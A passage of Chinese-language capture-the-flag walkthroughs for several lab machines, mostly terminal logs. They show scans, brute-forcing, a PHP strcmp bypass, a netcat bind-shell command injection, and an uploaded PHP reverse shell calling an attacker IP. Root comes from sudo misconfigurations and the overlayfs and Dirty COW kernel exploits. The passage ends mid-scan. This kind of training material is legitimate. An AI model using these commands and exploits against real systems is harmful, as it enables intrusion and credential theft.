/usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tom@DC-2:~$ ls flag3.txt local.txt usr ``` ### ✅ Get User Flag > 在 `/home/tom`找到 User flag ## Privileges Escalation ### 8. 查看 flag3.txt ``` tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found tom@DC-2:~$ vi flag.txt poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. ``` ### 9. Vi 跳脫 restricted shell 先嘗試 Python 取得互動式 Shell ``` tom@DC-2:~$ echo $PATH /home/tom/usr/bin tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH -rbash: PATH: readonly variable tom@DC-2:~$ python -c 'import os; os.system("/bin/sh")' -rbash: python: command not found tom@DC-2:~$ python3 -c 'import os; os.system("/bin/sh")' -rbash: python3: command not found ``` > 還是不行 使用 vi 可以 escape restricted shell,再加入 `/bin` 路徑 ``` vi :set shell=/bin/sh :shell $ whoami /bin/sh: 1: whoami: not found $ bash -i /bin/sh: 2: bash: not found $ su jerry /bin/sh: 3: su: not found $ export PATH=/bin:/usr/bin:$PATH $ id uid=1001(tom) gid=1001(tom) groups=1001(tom) ``` ### 10. 使用 user jerry ``` $ su jerry Password: jerry@DC-2:/home/tom$ ls /home/jerry flag4.txt jerry@DC-2:/home/tom$ cat flag4.txt cat: flag4.txt: Permission denied ``` ### 11. Sudo -l ``` jerry@DC-2:~$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git ``` ### 12. [GTFO](https://gtfobins.github.io/gtfobins/git/#sudo): git ``` jerry@DC-2:~$ sudo git -p help config ... !/bin/sh # id uid=0(root) gid=0(root) groups=0(root) # ls /root final-flag.txt proof.txt ``` ### ✅ Get Root FLAG # CyberSploit1 ![image](https://hackmd.io/_uploads/H1PneOK3Jx.png) ## Soulution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV 192.168.111.92 Nmap scan report for 192.168.111.92 Host is up (0.17s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA) | 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA) |_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-title: Hello Pentester! |_http-server-header: Apache/2.2.22 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds ``` #### 1.2 dirsearch ``` ┌──(chw㉿CHW)-[~] └─$ dirsearch -u http://192.168.111.92/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/chw/reports/http_192.168.111.92/__25-03-20_06-59-27.txt Target: http://192.168.111.92/ ... [07:00:11] 200 - 73B - /robots.txt ... ``` 查看 /robots.txt 內容 ``` ┌──(chw㉿CHW)-[~] └─$ curl http://192.168.111.92/robots.txt Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= ``` (Base64 decode)\ `cybersploit{youtube.com/c/cybersploit}` ??! #### 1.3 Source code view-source:http://192.168.111.92/#\ ![image](https://hackmd.io/_uploads/HJAEO_YnJg.png) > comment 中透露 User: `itsskv` ### 2. SSH Login 用 `itsskv`:`cybersploit{youtube.com/c/cybersploit}` ``` ┌──(chw㉿CHW)-[~] └─$ ssh itsskv@192.168.111.92 The authenticity of host '192.168.111.92 (192.168.111.92)' can't be established. ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs. ... Your Hardware Enablement Stack (HWE) is supported until April 2017. itsskv@cybersploit-CTF:~$ whoami itsskv ``` > 成功登入 ### ✅ Get User Flag > 在 `/home/itsskv`找到 User flag ## Privileges Escalation ### 1. LinPEAS ``` ┌──(chw㉿CHW)-[/usr/share/peass/linpeas] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` itsskv@cybersploit-CTF:~$ wget http://192.168.45.193/linpeas.sh itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh itsskv@cybersploit-CTF:~$ ./linpeas.sh ``` ### 2. searchsploit ``` itsskv@cybersploit-CTF:~$ uname -a Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux ``` (Kali) ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit Linux 3.13.0-32 ... inux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt ... ┌──(chw㉿CHW)-[~] └─$ searchsploit -m 37292 Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation URL: https://www.exploit-db.com/exploits/37292 Path: /usr/share/exploitdb/exploits/linux/local/37292.c Codes: CVE-2015-1328 Verified: True File Type: C source, ASCII text, with very long lines (466) Copied to: /home/chw/37292.c ``` ### 3. exploit ``` itsskv@cybersploit-CTF:~$ wget http://192.168.45.193/37292.c itsskv@cybersploit-CTF:~$ cat 37292.c /* # Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id ``` 依照 exploit 步驟 ``` itsskv@cybersploit-CTF:~$ gcc 37292.c -o ofs itsskv@cybersploit-CTF:~$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),1001(itsskv) ``` ### ✅ Get Root FLAG # Potato ![image](https://hackmd.io/_uploads/r1jASYF2yx.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 192.168.111.101 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 08:11 EDT Nmap scan report for 192.168.111.101 Host is up (0.12s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA) | 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA) |_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Potato company |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.64 seconds ``` #### 1.2 dirsearch ``` ┌──(chw㉿CHW)-[~] └─$ dirsearch -u http://192.168.111.101 ... [08:13:43] 301 - 318B - /admin -> http://192.168.111.101/admin/ [08:13:44] 200 - 228B - /admin/ [08:13:44] 200 - 228B - /admin/index.php [08:13:44] 200 - 489B - /admin/logs/ ... ``` - 瀏覽路徑 `/admin/index.php`\ ![image](https://hackmd.io/_uploads/r1NRDKKnkl.png) - 瀏覽路徑 `/admin/logs`\ ![image](https://hackmd.io/_uploads/SyMxdtFnke.png) - `/admin/logs/log_01.txt` ![image](https://hackmd.io/_uploads/HJec5ttnyx.png) - `/admin/logs/log_02.txt` ![image](https://hackmd.io/_uploads/B14ocFK31x.png) - `/admin/logs/log_03.txt` ![image](https://hackmd.io/_uploads/HkWp5tt2kl.png) ### 2. hydra - HTTP Post ![image](https://hackmd.io/_uploads/S1t70tthyx.png) ``` ┌──(chw㉿CHW)-[~] └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.111.101 http-post-form "/admin/index.php?login=1:username=admin&password=^PASS^:F=Bad user/password! " ``` - SSH ``` ┌──(chw㉿CHW)-[~] └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.111.101 ``` >[!Tip] 天荒地老 ### 3. Nmap -p- ``` ┌──(chw㉿CHW)-[~] └─$ sudo nmap -sS -p- 192.168.111.101 [sudo] password for chw: Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 09:46 EDT Nmap scan report for 192.168.111.101 Host is up (0.089s latency). Not shown: 65521 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 2112/tcp open kip ┌──(chw㉿CHW)-[~] └─$ sudo nmap -sC -sV -p 2112 192.168.111.101 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 09:52 EDT Nmap scan report for 192.168.111.101 Host is up (0.10s latency). PORT STATE SERVICE VERSION 2112/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak |_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg ``` > Anonymous FTP login allowed ### 4. ftp 使用 `anonymous` 連線 ``` ┌──(chw㉿CHW)-[~] └─$ ftp anonymous@192.168.111.101 2112 Connected to 192.168.111.101. 220 ProFTPD Server (Debian) [::ffff:192.168.111.101] 331 Anonymous login ok, send your complete email address as your password Password: 230-Welcome, archive user anonymous@192.168.251.111 ! 230- 230-The local time is: Thu Mar 20 13:55:30 2025 230- 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 229 Entering Extended Passive Mode (|||22207|) 150 Opening ASCII mode data connection for file list -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak -rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg 226 Transfer complete ftp> ``` 將 `index.php.bak` 與 `welcome.msg` 取出查看 ``` ftp> get index.php.bak local: index.php.bak remote: index.php.bak 229 Entering Extended Passive Mode (|||33583|) 150 Opening BINARY mode data connection for index.php.bak (901 bytes) 901 226.01 KiB/s 226 Transfer complete 901 bytes received in 00:00 (9.81 KiB/s) ftp> get welcome.msg local: welcome.msg remote: welcome.msg 229 Entering Extended Passive Mode (|||48470|) 150 Opening BINARY mode data connection for welcome.msg (54 bytes) 54 446.90 KiB/s 226 Transfer complete 54 bytes received in 00:00 (0.60 KiB/s) ``` - index.php.bak: ![image](https://hackmd.io/_uploads/Hy2NyjFhyg.png) > php-strcmp 可以被 bypass - welcome.msg: ![image](https://hackmd.io/_uploads/BydIkot2Jg.png) ### 5. Bypass PHP strcmp https://rst.hashnode.dev/bypassing-php-strcmp\ 可以透過 empty array,`[]` bypass 驗證\ ``` username=admin&password[]=chw ``` ![image](https://hackmd.io/_uploads/ryejlitnyg.png) ### 6. Admin Page http://192.168.111.101/admin/dashboard.php\ ![image](https://hackmd.io/_uploads/HJwmGiY3yg.png) 其中 Logs 功能:\ ![image](https://hackmd.io/_uploads/HJ0LGsFnJl.png) 嘗試 Path Traversal: `file=../../../../../etc/passwd`\ ![image](https://hackmd.io/_uploads/rkMgQjKnyl.png) > `webadmin`:`$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/` >> 1. 嘗試 hashcat 爆破 >> 2. command injection: >> - reverse shell 打不回來 >> - 使用 bind shell >> `file=;nc -l -v -p 6666 -e /bin/sh` ### 7. bind shell `file=;nc -l -v -p 6666 -e /bin/sh` ``` ┌──(chw㉿CHW)-[~] └─$ nc 192.168.111.101 6666 python3 -c "import pty;pty.spawn('/bin/bash')" www-data@serv:/var/www/html/admin$ ``` ### ✅ Get User Flag > 在 `/home/webadmin`找到 User flag ## Privileges Escalation 先拿到低權限 User ### 8. Hashcat ``` ┌──(chw㉿CHW)-[~] └─$ hashcat -m 500 potato.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force ... $1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:dragon ... ``` > `webadmin`:`dragon` ### 9. Sudo -l ``` ┌──(chw㉿CHW)-[~] └─$ ssh webadmin@192.168.111.101 webadmin@192.168.111.101's password: webadmin@serv:~$ sudo -l [sudo] password for webadmin: Matching Defaults entries for webadmin on serv: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User webadmin may run the following commands on serv: (ALL : ALL) /bin/nice /notes/* webadmin@serv:~$ sudo nice /bin/sh Sorry, user webadmin is not allowed to execute '/usr/bin/nice /bin/sh' as root on serv. ``` 使用 /bin/nice 執行 ``` webadmin@serv:~$ /bin/nice /bin/bash webadmin@serv:~$ id uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin) webadmin@serv:~$ ls /notes/ clear.sh id.sh webadmin@serv:~$ sudo /bin/nice /notes/id.sh uid=0(root) gid=0(root) groups=0(root) ``` 目標: 使用 `/bin/nice` 執行 Shell 就能拿到 root 權限 (`sudo -l` 只會驗證 `/notes/*` 參數) ``` webadmin@serv:~$ sudo /bin/nice /notes/../bin/bash root@serv:/home/webadmin# id uid=0(root) gid=0(root) groups=0(root) root@serv:/home/webadmin# cd /root root@serv:~# ls proof.txt root.txt snap ``` ### ✅ Get Root FLAG # DriftingBlues6 ![image](https://hackmd.io/_uploads/HycnGK52Jl.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 -p- 192.168.171.219 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 02:01 EDT Nmap scan report for 192.168.171.219 Host is up (0.10s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-title: driftingblues |_http-server-header: Apache/2.2.22 (Debian) | http-robots.txt: 1 disallowed entry |_/textpattern/textpattern Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 333.47 seconds ``` #### 1.1 Dirb ``` ┌──(chw㉿CHW)-[~] └─$ dirb http://192.168.171.219/ ----------------- DIRB v2.22 By The Dark Raver ----------------- ---- Scanning URL: http://192.168.171.219/ ---- + http://192.168.171.219/cgi-bin/ (CODE:403|SIZE:291) + http://192.168.171.219/db (CODE:200|SIZE:53656) + http://192.168.171.219/index (CODE:200|SIZE:750) + http://192.168.171.219/index.html (CODE:200|SIZE:750) + http://192.168.171.219/robots (CODE:200|SIZE:110) + http://192.168.171.219/robots.txt (CODE:200|SIZE:110) + http://192.168.171.219/server-status (CODE:403|SIZE:296) ==> DIRECTORY: http://192.168.171.219/textpattern/ + http://192.168.171.219/textpattern/index.php (CODE:200|SIZE:12414) + http://192.168.171.219/textpattern/LICENSE (CODE:200|SIZE:15170) + http://192.168.171.219/textpattern/README (CODE:200|SIZE:6311) ==> DIRECTORY: http://192.168.171.219/textpattern/rpc/ ==> DIRECTORY: http://192.168.171.219/textpattern/textpattern/ ==> DIRECTORY: http://192.168.171.219/textpattern/themes/ ``` - 瀏覽頁面 `/robots.txt`:\ ![image](https://hackmd.io/_uploads/rJApccc21x.png) > `dont forget to add .zip extension to your dir-brute ;)` 用 `.zip` extension 重掃一次 ``` ┌──(chw㉿CHW)-[~] └─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.171.219/FUZZ.zip /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://192.168.171.219/FUZZ.zip :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ # or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 107ms] # [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 107ms] # Copyright 2007 James Fisher [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 112ms] # Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms] # Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms] # directory-list-2.3-medium.txt [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms] # [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms] # on atleast 2 different hosts [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 1203ms] # [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 2205ms] # This work is licensed under the Creative Commons [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 2206ms] # license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 3214ms] # [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 4216ms] # Priority ordered case sensative list, where entries were found [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 4226ms] spammer [Status: 200, Size: 179, Words: 3, Lines: 2, Duration: 103ms] :: Progress: [220560/220560] :: Job [1/1] :: 397 req/sec :: Duration: [0:09:57] :: Errors: 0 :: ``` > spammer.zip - 瀏覽頁面 `/textpattern/index.php` ![image](https://hackmd.io/_uploads/rJyXh5531x.png) > PHP 環境未設定 `date.timezone` - 瀏覽頁面 `/textpattern/textpattern/` ![image](https://hackmd.io/_uploads/r1iHn9c3Jl.png) > 沒有透露 textpattern 版本,無法選定 exploit\ > 在 `http://192.168.171.219/textpattern/README`找到版本\ > >Textpattern CMS 4.8.3\ > >![image](https://hackmd.io/_uploads/H1fwWs9nkg.png) > > exploit 48943 需要透過 file upload - 瀏覽頁面 `/textpattern/textpattern/setup/index.php` ![image](https://hackmd.io/_uploads/HJSc25c3kg.png) > `/textpattern/textpattern/setup/index.php` 透露資訊:\ > ![image](https://hackmd.io/_uploads/HJk0-jqnke.png) ### 2. wget zip 總結上述 recon,先從題目提示 robots 下手 ``` ┌──(chw㉿CHW)-[~] └─$ wget http://192.168.171.219/spammer.zip ┌──(chw㉿CHW)-[~] └─$ unzip spammer.zip Archive: spammer.zip [spammer.zip] creds.txt password: ``` > 需要密碼 ### 3. fcrackzip ``` ┌──(chw㉿CHW)-[~] └─$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip found file 'creds.txt', (size cp/uc 27/ 15, flags 1, chk b003) PASSWORD FOUND!!!!: pw == myspace4 ``` > `spammer.zip`:`myspace4` 解壓縮 `spammer.zip` ``` ┌──(chw㉿CHW)-[~] └─$ unzip spammer.zip Archive: spammer.zip [spammer.zip] creds.txt password: extracting: creds.txt ┌──(chw㉿CHW)-[~] └─$ cat creds.txt mayer:lionheart ``` 嘗試用帳密登入 `/textpattern/textpattern/index.php` ### 4. Login textpattern ![image](https://hackmd.io/_uploads/BycEroq31l.png) #### 4.1 Articles Page 在 Articles 一篇文章介紹功能:\ ![image](https://hackmd.io/_uploads/rJJM8jq3kg.png) #### 4.2 利用 file upload http://192.168.171.219/textpattern/textpattern/index.php?event=file ![image](https://hackmd.io/_uploads/H197Pi9nJx.png) #### 4.3 撰寫 Reverse shell 使用現成 [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) 寫好的 reverse shell ``` ┌──(chw㉿CHW)-[~/Desktop/Tool_upload] └─$ cat chw_revshell.php <?php set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.45.221'; // CHANGE THIS $port = 8888; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); ... ┌──(chw㉿CHW)-[~/Desktop/Tool_upload] └─$ nc -nvlp 8888 listening on [any] 8888 ... ``` #### 4.4 上傳並利用 ![image](https://hackmd.io/_uploads/SkwIwjq3yg.png) filename 會檔掉 `..`,無法塞到 `/var/www/` ![image](https://hackmd.io/_uploads/HJ1rknq3kx.png) > 失敗 結果在 HTML tag 的地方可以直接看到路徑\ ![image](https://hackmd.io/_uploads/rJ45k29hyx.png) > 塞了一堆 🚮🚮🚮 > > `<a href="/textpattern/index.php?s=file_download&#38;id=7">chw_revshell_finla.php</a>` 直接瀏覽 http://192.168.171.219/textpattern/files/ 點選上傳的 reverse shell\ ![image](https://hackmd.io/_uploads/rJ8Hm293kx.png) ``` ┌──(chw㉿CHW)-[~/Desktop/Tool_upload] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.221] from (UNKNOWN) [192.168.171.219] 52461 Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux 04:36:04 up 3:39, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ bash -i bash: no job control in this shell www-data@driftingblues:/home$ ls /home ls /home www-data@driftingblues:/home$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false ``` >[!Tip] 沒有 User Flag ?! 應該不是權限太小 (都可以讀 `/etc/passwd`了) 確認權限 ``` www-data@driftingblues:/home$ sudo -l sudo -l bash: sudo: command not found www-data@driftingblues:/home$ ls -lah /etc/passwd ls -lah /etc/passwd -rw-r--r-- 1 root root 868 Mar 17 2021 /etc/passwd www-data@driftingblues:/home$ find / -writable -type d 2>/dev/null find / -writable -type d 2>/dev/null /run/shm /run/lock /run/lock/apache2 /var/www/textpattern/files /var/lib/php5 /var/cache/apache2/mod_disk_cache /var/tmp /proc/3686/task/3686/fd /proc/3686/fd /tmp ``` ## Privileges Escalation ### 5. searchsploit ``` www-data@driftingblues:/home$ uname -a uname -a Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux ``` ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit Linux 3.2.0-4 ... Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c ... ``` ### 6. exploit (Dirty COW(CVE-2016-5195)) 利用 Dirty COW 的 race condition 改寫 /etc/passwd 來建立或覆蓋帳號 ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit -x 40839 Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) URL: https://www.exploit-db.com/exploits/40839 Path: /usr/share/exploitdb/exploits/linux/local/40839.c Codes: CVE-2016-5195 Verified: True File Type: C source, ASCII text ┌──(chw㉿CHW)-[~] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` www-data@driftingblues:/home$ cd /tmp www-data@driftingblues:/tmp$ wget http://192.168.45.221/dirty www-data@driftingblues:/tmp$ ./dirty ./dirty Please enter the new password: chw /etc/passwd successfully backed up to /tmp/passwd.bak Complete line: firefart:fi2TcL2BkmbVQ:0:0:pwned:/root:/bin/bash mmap: 7ffa82462000 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password 'chw'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd /etc/passwd successfully backed up to /tmp/passwd.bak Complete line: firefart:fi2TcL2BkmbVQ:0:0:pwned:/root:/bin/bash mmap: 7ffa82462000 madvise 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password 'chw'. ``` ### 7. 登入 firefart ``` www-data@driftingblues:/tmp$ su firefart su firefart su: must be run from a terminal www-data@driftingblues:/tmp$ python -c 'import pty; pty.spawn("/bin/bash")' www-data@driftingblues:/tmp$ su firefart su firefart Password: chw firefart@driftingblues:/tmp# id id uid=0(firefart) gid=0(root) groups=0(root) ``` 所以真沒有 User Flag ?!\ ![image](https://hackmd.io/_uploads/H1Otc2qnkl.png) ### ✅ Get Root FLAG # Stapler ![image](https://hackmd.io/_uploads/HJcDfhT2Jg.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -p- 192.168.124.148 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-23 12:09 EDT Stats: 0:02:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 12:12 (0:00:06 remaining) Nmap scan report for 192.168.124.148 Host is up (0.097s latency). Not shown: 65523 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 550 Permission denied. | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.178 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) 53/tcp open tcpwrapped 80/tcp open http PHP cli server 5.5 or later |_http-title: 404 Not Found 123/tcp closed ntp 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open pkzip-file .ZIP file | 